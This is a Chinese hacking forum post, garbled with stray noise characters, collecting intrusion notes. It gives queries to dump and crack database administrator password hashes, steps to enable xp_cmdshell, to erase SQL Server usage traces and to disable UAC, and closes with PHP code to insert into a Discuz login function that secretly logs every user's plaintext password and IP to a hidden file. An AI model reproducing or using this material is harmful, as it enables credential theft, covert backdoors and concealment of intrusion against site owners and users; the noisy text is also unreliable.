& a/ [ M' N) m$ Q: F1 ~; t各种类型数据库抓HASH破解最高权限密码!
i `# ~6 r- a( g1.sql server2000# c4 f# C, r; Q8 ~
SELECT password from master.dbo.sysxlogins where name='sa'5 C7 u& y7 Y R! b$ g
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341 |- s1 c4 N6 P: m- b/ n' T3 E. V/ K$ \
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
% B+ L( {6 ?/ y- D7 l
8 W, m8 o& t5 l" C3 P1 \' a0×0100- constant header; S/ b, R# K8 n" m( ]( ?4 s
34767D5C- salt) Q: @0 T- h3 H* O( r" z2 t8 U
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
h5 v/ T! y. i, S* q+ C8 D1 s2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash* @( k- V+ B7 I" \, O
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash9 Q8 z0 H' [9 |+ A f( L: e
SQL server 2005:-8 u3 r+ K! R; c
SELECT password_hash FROM sys.sql_logins where name='sa'
6 ?1 e; D: M8 c9 G9 j0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F. E( x+ y1 y- |4 {* Y1 R: f+ ^$ g( }
0×0100- constant header
2 ]9 i# j) b, a7 I3 x8 l- G993BF231-salt8 w: ], ~1 N) ~! L" L& m: N% f
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
# N z: Q4 s {; M" tcrack case sensitive hash in cain, try brute force and dictionary based attacks.
# @* H2 B+ G$ f; w$ Q: }, j
4 b4 g& |# T l1 d1 H X6 f$ V( ^update:- following bernardo’s comments:-* I9 Z* h; G2 x" J. p0 }
use function fn_varbintohexstr() to cast password in a hex string.8 N1 s+ z8 x# H4 j
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins- Y* i6 c# P/ J
- y; d, W2 y9 \$ I+ ^MYSQL:-8 J2 P( e; S" i1 m' ~2 u
: m! ^; Q6 ^/ I2 j* U! K) y( E) mIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
% ]9 |1 q' ~! T* Y, }1 B7 L9 t/ \6 f. g U/ B
*mysql < 4.1
3 Q, m x$ s$ O& \5 G' q: l5 d" J5 A' N5 K* v D9 T( D
mysql> SELECT PASSWORD(‘mypass’);0 D7 h% m5 J# ?, r9 Z
+——————–+8 |" G' L, s6 U* p
| PASSWORD(‘mypass’) |9 e, ~0 g: I. M7 B4 }6 d8 s
+——————–+" u+ W. N2 |& ^' n
| 6f8c114b58f2ce9e |
* ]" o3 g, w* a$ ]+ B+——————–+ j7 F7 z! n4 Y9 {4 y3 M
; G2 }" ?1 g, u% X% Z/ f4 c
*mysql >=4.1" K$ s4 S% [1 c: l7 D! N# B3 y
, x9 H% ]- W" s+ Vmysql> SELECT PASSWORD(‘mypass’);
0 m5 E4 w+ s6 |( t J) h5 X+——————————————-+
0 z: Y5 U" F6 @| PASSWORD(‘mypass’) |1 O. R5 I% d& j4 ^8 \
+——————————————-+
( P# p, h5 _, k' U2 H. ?1 j0 V| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
# W ?5 P+ }6 B: ^' h ^1 h+——————————————-+
3 h2 m: `' O0 @# \5 _6 A: @* b* Y+ ]/ U( O9 q4 H6 h+ q
Select user, password from mysql.user
2 d! `5 j# l; j; x( {The hashes can be cracked in ‘cain and abel’* @+ \4 }% L$ c J
* G% J" p$ Q/ i ]Postgres:-* v1 U1 e5 Q7 d
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
3 N! t1 T& e+ hselect usename, passwd from pg_shadow;* d/ b S; a( g0 b$ L4 k6 {
usename | passwd
8 J8 M1 j( Z2 H; T. @; I# P——————+————————————-
Y/ s* V2 {0 r6 O2 X Y$ w- W4 H6 Ktestuser | md5fabb6d7172aadfda4753bf0507ed4396; B. j! t. d. v6 D* j# R& O
use mdcrack to crack these hashes:-, Z. G6 p4 e) s" p9 w. c* I
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
! j i# e1 w7 l: c3 s
' z4 n" _+ \9 k0 mOracle:-
: ]" R$ J+ Y, U' e, Uselect name, password, spare4 from sys.user$
- [0 M/ @3 M4 Q# H: i1 rhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
: L( N2 n2 d/ @More on Oracle later, i am a bit bored….9 g/ c: o" {/ `! y1 F
_, x9 f0 Z9 }6 n( x+ m$ _! z! ~" }
在sql server2005/2008中开启xp_cmdshell
. { j$ n- M6 B! F* O-- To allow advanced options to be changed.1 B" F0 V4 J, K a4 o! C: v9 s" F
EXEC sp_configure 'show advanced options', 1
$ c8 U4 Y' j7 I, W, l- J; bGO
% x2 s/ U3 U2 Y! X-- To update the currently configured value for advanced options.7 v! B) V* l( `+ f
RECONFIGURE
! `4 R- u& o( w1 C/ [GO1 m# S3 {' W5 g; e, ?9 f: @/ j
-- To enable the feature.- @; h2 \3 L# v' k* a
EXEC sp_configure 'xp_cmdshell', 1+ Z( m7 m" ~. M9 U% s9 E
GO# ]+ O3 @. |# D. |( b
-- To update the currently configured value for this feature.
$ X: v5 A! r- E2 }/ W! h2 qRECONFIGURE3 P. S2 I% \0 a/ z, t1 b# ~. e
GO
: c/ P4 C6 E8 zSQL 2008 server日志清除,在清楚前一定要备份。. p7 X" q5 h! y& k
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
4 V0 ?3 A- `5 g; s* eX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin5 e8 b3 @# M& o0 G. b* _
1 I N% N8 P ?% K0 i) x
对于SQL Server 2008以前的版本:
" N& P v5 E' K8 eSQL Server 2005:5 `; s! y, g4 p8 z1 S
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
; m6 A. u$ |/ U ?8 cSQL Server 2000:
6 g/ O& r) }# p0 I) Q+ _$ L清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。+ ]# W9 L% r0 f0 p
7 L! s8 r& Q6 R本帖最后由 simeon 于 2013-1-3 09:51 编辑
7 V+ R& ?; q. T( c$ A0 U1 P+ J! k P! f
' B4 W/ Y- S' r) {: xwindows 2008 文件权限修改* t- T' N1 q# x$ \, i7 y, d; }
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
' h8 i& d! k0 E2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
! G5 P: W$ T* f; X一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
0 q0 N+ l: o4 M; J+ N- \1 {. C$ ^8 S- m l( a$ M
Windows Registry Editor Version 5.00, O m+ U: P* T4 }) @
[HKEY_CLASSES_ROOT\*\shell\runas], E% y$ e: C3 V6 t. O' T# J
@="管理员取得所有权"
: Q1 v/ g2 |! j K- L"NoWorkingDirectory"=""
$ Y" S" f4 Y6 V[HKEY_CLASSES_ROOT\*\shell\runas\command]* v# m& M; o o; ~& V- B
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, r7 a0 `# v2 H# u"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
. @3 k, r: H) k5 R+ N[HKEY_CLASSES_ROOT\exefile\shell\runas2] a/ V3 e( z% `
@="管理员取得所有权"
$ Y, x+ e- z, G) u1 E/ E"NoWorkingDirectory"=""/ L( o9 U4 ]7 m/ _( G' e- y" p
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
$ |% ^. Y0 n6 R- p/ i" ~; V/ {@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"" _4 P3 g5 C( R% J: ?$ O
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
5 ?3 z- V. ~5 [& K8 ~* C. L
5 M* Y u9 z- ]1 M( W N[HKEY_CLASSES_ROOT\Directory\shell\runas]' j0 h. E. p" i, O
@="管理员取得所有权"
; `: D0 t% Z" K1 [9 ^. k* M' U"NoWorkingDirectory"=""7 _0 |2 K. ?# N& w- o# p4 O4 O
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
& B) l9 B; Q0 ~" {9 ~@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
3 X( |1 s* m. W"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"$ h; M+ r$ I0 y3 R+ \( T
* g+ ?0 q" ~; x
5 C Y% |. M; B8 x" ]win7右键“管理员取得所有权”.reg导入% i: B0 U4 l, W2 c: f/ y! |2 P" Y$ q
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
) M8 U: i. z- z1 {/ ?4 `: M) w1、C:\Windows这个路径的“notepad.exe”不需要替换
" ^* ~4 |0 }5 B2、C:\Windows\System32这个路径的“notepad.exe”不需要替换5 M+ Y: B8 @( k* ~/ C
3、四个“notepad.exe.mui”不要管
! c/ `: V+ d" L! O) A4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和4 {) m( m5 _! i
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
6 c5 }$ u# {; L3 Y& o }替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
9 ~4 |1 o8 t5 y* A$ Z& p& a替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
]1 D* U9 R3 x9 A7 gwindows 2008中关闭安全策略:
, D2 p: ]* k7 M* n6 Nreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
% |1 X& L3 w, C2 c" T修改uc_client目录下的client.php 在
$ y: `/ G6 @; T4 }' Yfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {; l" p* m% K# L5 M+ p7 P" J
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
* P0 s2 V& p, ?/ Q, q/ D4 j你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
7 B! o) w8 w% Oif(getenv('HTTP_CLIENT_IP')) {
9 q! X" l9 H" g$onlineip = getenv('HTTP_CLIENT_IP');. h1 [- U* r7 i
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {/ G. {0 K: [5 p2 o1 B' }
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
1 a- g- }8 {% P( ^" _} elseif(getenv('REMOTE_ADDR')) {: l! I: S, D1 k" f
$onlineip = getenv('REMOTE_ADDR');5 a9 {2 L2 v; ?$ P, P3 ]9 U. Z
} else {
( ~" B6 Q& k4 i3 X n- i- `$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];1 ]8 r. ~2 t2 O6 }7 d. H$ R* i
}
- @; B; p! l& c6 ]3 Z3 M. { $showtime=date("Y-m-d H:i:s");8 ~9 q; l: x' u* ~ {# r: ?1 ^
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
& ]5 k7 q: | G: X6 } $handle=fopen('./data/cache/csslog.php','a+');
! q; a) D1 z; e, @3 h& W8 @ $write=fwrite($handle,$record); |